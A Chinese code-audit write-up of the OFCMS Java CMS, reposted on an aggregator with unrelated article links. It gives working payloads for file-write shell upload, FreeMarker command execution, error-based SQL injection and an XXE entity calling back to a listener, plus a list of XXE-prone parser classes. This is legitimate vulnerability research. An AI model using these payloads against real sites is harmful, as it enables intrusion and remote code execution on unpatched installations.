[Java代码审计]—OFCMS

news2024/11/18 21:48:45

环境搭建

下载地址:https://gitee.com/oufu/ofcms/repository/archive/V1.1.2?format=zip

项目导入idea,创建数据库,配置下tomcat就行,但要注意必须tomcat>8.5,mysql>5.7

漏洞分析

任意文件写入

com.ofsoft.cms.admin.controller.cms.TemplateController

在这里插入图片描述

pathFile会获取环境中的地址并与传入的dir进行拼接,file_name为我们传入的文件名,file_content为文件内容,并且整个过程中没做任何过滤,因此存在任意文件写入

将shell到static下

在这里插入图片描述

成功写入shell

在这里插入图片描述

jsp无法解析

上边并没有传到根目录下,而是上传到了/static,主要是因为在BaseController中定义了渲染方法,这个方法在js中会被调用,如果访问的文件目录不包含.html则会在后边加上.html,因此访问jsp文件则相当于访问了1.jsp.html

在这里插入图片描述

因此就需要写到静态目录下。

模板注入

由于该cms模版引擎是freemarker,该模版引擎是存在模版注入的,结合上边的任意写,可以将下边内容写入html页面中

<#assign value="freemarker.template.utility.Execute"?new()>${value("calc.exe")}

MCMS中有过了就不做过多解释了,访问index.html成功被渲染执行
在这里插入图片描述

SQL注入

com.ofsoft.cms.admin.controller.system.SystemGenerateController的create()方法中sql执行语句可控

在这里插入图片描述

看下update()方法,一级级跟进发现update方法会对我们传入的执行语句进行预处理,但是我们可以直接输入整条SQL语句执行,不使用占位符,所以这里预编译处理将不起作用

在这里插入图片描述

payload

update of_cms_link set link_name=updatexml(1,concat(0x7e,(user())),0) where link_id = 4

在这里插入图片描述

XXE

com.ofsoft.cms.admin.controller.ReprotAction的expReport()方法中,会接收参数j并拼接到路径file中,之后会通过JasperCompileManager.compileReport()渲染导致外部实体注入

在这里插入图片描述

跟进compileReport()看下,逐步跟进到xmlLoader.loadXML后,在loadXML()方法中,调用Digester类的parse方法来解析XML文件的内容,并且没有禁用外部实体

在这里插入图片描述

那么就可以通过上班的任意文件写入,写入一个恶意文件,在通过j变量,传入指定路径并进行解析

上传shell.jrxml到static目录下

<!DOCTYPE A[
<!ENTITY % xxe SYSTEM "http://127.0.0.1:7777">%xxe;]>

本地开启监听服务

python -m http.server 7777

传参

在这里插入图片描述

xxe常见关键词

javax.xml.parsers.DocumentBuilder
javax.xml.parsers.DocumentBuilderFactory
javax.xml.parsers.SAXParser
javax.xml.parsers.SAXParserFactory
javax.xml.transform.TransformerFactory
javax.xml.validation.Validator
javax.xml.validation.SchemaFactory
javax.xml.transform.sax.SAXTransformerFactory
javax.xml.transform.sax.SAXSource
org.xml.sax.XMLReader
org.xml.sax.helpers.XMLReaderFactory
org.dom4j.io.SAXReader
org.jdom.input.SAXBuilder
org.jdom2.input.SAXBuilder
javax.xml.bind.Unmarshaller
javax.xml.xpath.XpathExpression
javax.xml.stream.XMLStreamReader
org.apache.commons.digester3.Digester

XSS

在1.1.3版本中,增文章评论功能,该功能存在 xss

在save方法中 调用了getParamsMap方法,获取用户提交的所有参数。 又调用 getRealIp()方法 获取到ip,写入 params参数的comment_ip 键中。
之后 调用 Db.update()方法将数据更新到数据库中。(这里虽然用到了getSqlPara进行预编译,但是并不会对xss语句进行处理)

在这里插入图片描述

参考链接

【Java代码审计】OFCMS 1.1.3 审计_ofcms环境搭建_YouthBelief的博客-CSDN博客

奇安信攻防社区-记又一次Java代码审计 (butian.net)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/388781.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

打包可执行文件

打包可执行文件

将Python脚本打包成可执行文件的方法&#xff1a;使用pip安装PyInstaller&#xff1a;pip install pyinstaller打开终端并导航到包含Python脚本的目录。运行PyInstaller创建可执行文件&#xff1a;pyinstaller --onefile phonequeryresult.py将my_script.py替换为您的脚本名称。…
阅读更多...
SpringBoot(tedu)——day01——环境搭建

SpringBoot(tedu)——day01——环境搭建

SpringBoot(tedu)——day01——环境搭建 目录SpringBoot(tedu)——day01——环境搭建零、今日目标一、IDEA2021项目环境搭建1.1 通过 ctrl鼠标滚轮 实现字体大小缩放1.2 自动提示设置 去除大小写匹配1.3 设置参数方法自动提示1.4 设定字符集 要求都使用UTF-8编码1.5 设置自动编…
阅读更多...
LDO的强力对手

LDO的强力对手

开题前咋们先来温习下LDO的特点以及选型要点&#xff1a; 特点&#xff1a;纹波噪声小&#xff0c;响应快&#xff0c;低静态电流&#xff0c;外围电路简单&#xff1b;损耗大&#xff0c;输出电流小。常用于小电流的模拟电路供电。 选型要点&#xff1a;纹波噪声&#xff0c…
阅读更多...
TEX:文档的布局与组织

TEX:文档的布局与组织

文章目录标准的类选项指定纸张大小页面格式其他选项与某些选项相关的参数页面样式页眉页的编号fancyhdr页眉页脚宏包(重)定义fancy页面样式Using extramarks文档中页面风格切换与段落有关的距离页面格式单双列页面文档中的部分标题摘要章节附录书的结构目录表自动条目显示目录表…
阅读更多...
XMLHttpRequest、ajax、Promise、axios、async await

XMLHttpRequest、ajax、Promise、axios、async await

1.XMLHttpRequest(xhr) 什么是xhr xhr是浏览器提供的js对象&#xff0c;通过它来向服务器来请求资源。jquery中的Ajax是基于xhr对象来封装资源的 使用xhr发起get请求 // 1. 创建 XHR 对象var xhr new XMLHttpRequest()console.log(xhr, 我是xhr);// 2. 调用 open 函数xhr.…
阅读更多...
性能优化(2)-渲染优化

性能优化(2)-渲染优化

一、渲染优化 如果把浏览器呈现页面的整个过程一分为二,前面所讲的主要是浏览器为呈现页面请求所需资源的部分;本章将主要关注浏览器获取到资源后,进行渲染部分的相关优化内容。 在前面的前端页面的生命周期课程中,介绍过关键渲染路径的概念,浏览器通过这个过程对HTML,CSS, J…
阅读更多...
<学习笔记>从零开始自学Python-之-web应用框架Django( 十二)上下文处理器

<学习笔记>从零开始自学Python-之-web应用框架Django( 十二)上下文处理器

1.在模板中处理上下文处理 上下文就是一系列模板变量和相应的值。模板使用上下文填充变量&#xff0c;放到标签里显示在页面。在 Django 中&#xff0c;上下文使用 django.template 模块中的 Context 类表示。 它的构造方法接受一个可选参数&#xff1a;一个字典&#xff0…
阅读更多...
HCIE-Cloud Computing LAB备考第二步:逐题攻破--第二题:FusionAccess-思维导图+题目=建立逻辑

HCIE-Cloud Computing LAB备考第二步:逐题攻破--第二题:FusionAccess-思维导图+题目=建立逻辑

第二题 FusionAccess markmap思维导图1 将上述思维导图跟下述题目结合,以题目顺序辅助记忆思维导图,有了思维大纲,做起实验,也就有逻辑线路,必定手掐把拿。 2.1 搭建FA实验环境(随机二考一) FA1、FA2两台服务器,请通过VNC登陆,按照题目要求根据服务器参数选择安装对…
阅读更多...
推荐几款主流好用的markdown编辑器

推荐几款主流好用的markdown编辑器

介绍 随着技术的不断发展和人们对效率的追求&#xff0c;Markdown 编辑器已经成为了许多人写作的首选工具。Markdown 是一种轻量级的标记语言&#xff0c;使用简单&#xff0c;方便快捷&#xff0c;且可以方便地转换成各种格式的文件。在这篇文章中&#xff0c;我们将介绍几款…
阅读更多...
移动端适配之动态 rem 方案

移动端适配之动态 rem 方案

代码 就是设置浏览器字体&#xff0c;从而实现根据屏幕动态计算大小 <script>const WIDTH 750; // 设计图尺寸const setView () > {document.documentElement.style.fontSize screen.width / WIDTH "px";};window.onorientationchange setView;setVi…
阅读更多...
JUC入门 | 黑马

JUC入门 | 黑马

一、进程和线程 进程 程序由指令和数据组成&#xff0c;但这些指令要运行&#xff0c;数据要读写&#xff0c;就必须将指令加载至CPU&#xff0c;数据加载至内存。在指令运行过程中还需要用到磁盘、网络等设备。进程就是用来加载指令、管理内存、管理I0的 当一个程序被运行&a…
阅读更多...
OpenGL中的坐标系

OpenGL中的坐标系

1、2D笛卡尔坐标系2D笛卡尔坐标系跟我们高中的时候学习的坐标系一样&#xff0c;是由x、y决定的。2、3D笛卡尔坐标系3D笛卡尔坐标系坐标由x、y、z决定&#xff0c;满足右手定则。3、视口glViewport(GLint x,GLint y,GLsizei width,GLsizei height)窗口和视口大小可以相同&#…
阅读更多...
手敲Mybatis-反射工具天花板

手敲Mybatis-反射工具天花板

历时漫长的岁月&#xff0c;终于鼓起勇气继续研究Mybatis的反射工具类们&#xff0c;简直就是把反射玩出花&#xff0c;但是理解起来还是很有难度的&#xff0c;涉及的内容代码也颇多&#xff0c;所以花费时间也比较浩大&#xff0c;不过当了解套路每个类的功能也好&#xff0c…
阅读更多...
@mixin与@include介绍

@mixin与@include介绍

目录mixin与include介绍定义一个mixin使用mixin传递变量如何引入mixinmixin与include介绍 在Sass里面&#xff0c;我们经常会见到mixin与include。 其中 mixin允许定义一个可以在整个样式表中重复使用的样式 include就是将我们定义的mixin引入到文档中 定义一个mixin mixin…
阅读更多...
【春招面经】视源股份前端一面

【春招面经】视源股份前端一面

前言 本次主要记录一下视源股份CVTE前端一面 &#xff08;3.3下午4点15&#xff09; 文章目录前言本次主要记录一下视源股份CVTE前端一面 &#xff08;3.3下午4点15&#xff09;问题总结介绍一下项目的来源以及做这个项目的初衷一直监听滚动&#xff0c;有没有对性能产生影响&a…
阅读更多...
大数据技术之——zeppelin数据清洗

大数据技术之——zeppelin数据清洗

一、zeppelin的安装zeppelin解压后进入到conf配置文件界面。修改zeppelin-site.xml[roothadoop02 conf]# cp zeppelin-site.xml.template zeppelin-site.xml[roothadoop02 conf]# vim zeppelin-site.xml将IP地址和端口号设置成自己的修改 zeppelin-env.shexport JAVA HOME/opt/…
阅读更多...
Linux小黑板(10):信号

Linux小黑板(10):信号

我们写在linux系统环境下写一个程序&#xff0c;唔&#xff0c;"它的功能是每隔1s向屏幕打印hello world。"这时&#xff0c;我们在键盘上按出"Ctrl C"后,进程会发生什么&#xff1f;&#xff1f;我们清晰地看到&#xff0c;进程已经在我们按出"Ctrl…
阅读更多...
UML2——行为图

UML2——行为图

目录 一、前言 二、活动图 三、交互图 3.1 一般序列图 3.2 时间约束序列图 3.3 协作图 四、用例图 五、状态图 一、前言 UML 是由视图&#xff08;View&#xff09;、图&#xff08;Diagrams&#xff09;、模型元素&#xff08;Model elements&#xff09;和通用机制等几…
阅读更多...
(图像分割)基于图论的归一化分割

(图像分割)基于图论的归一化分割

解释&#xff1a;将图像映射成图&#xff0c;以图为研究对象&#xff0c;利用图的理论知识获得图像的分割。 下面介绍&#xff1a;图的基本理论&#xff0c;基于图论的归一化分割算法 一、图的基本理论 图G&#xff1d;&#xff08;V&#xff0c;E&#xff0c;&#xff09;&…
阅读更多...
《管理世界》数据复现:国有资本参股如何影响民营企业?——基于债务融资视角的研究

《管理世界》数据复现:国有资本参股如何影响民营企业?——基于债务融资视角的研究

摘要&#xff1a; 本文以债务融资为切入点&#xff0c;从“未阐明的规则”和“阐明的规则”两个层面探讨了国有资本参股的“反向混改”是否以及如何影响民营企业。研究发现&#xff1a;国有资本参股可以显著降低民营企业的债务融资成本&#xff0c;扩大债务融资规模。…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023